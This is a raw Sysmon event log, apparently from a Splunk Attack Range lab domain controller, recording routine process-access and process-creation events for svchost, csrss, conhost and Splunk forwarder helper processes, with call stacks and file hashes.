10341000x80000000000000009634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93DC-6005-E304-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93DC-6005-E304-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-93DC-6005-E304-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.150{59A5CD1D-93DC-6005-E204-00000000A301}44443224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93DC-6005-E204-00000000A301}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93DC-6005-E204-00000000A301}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93DC-6005-E204-00000000A301}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.025{59A5CD1D-93DC-6005-E204-00000000A301}4444C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93DD-6005-E404-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:49.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 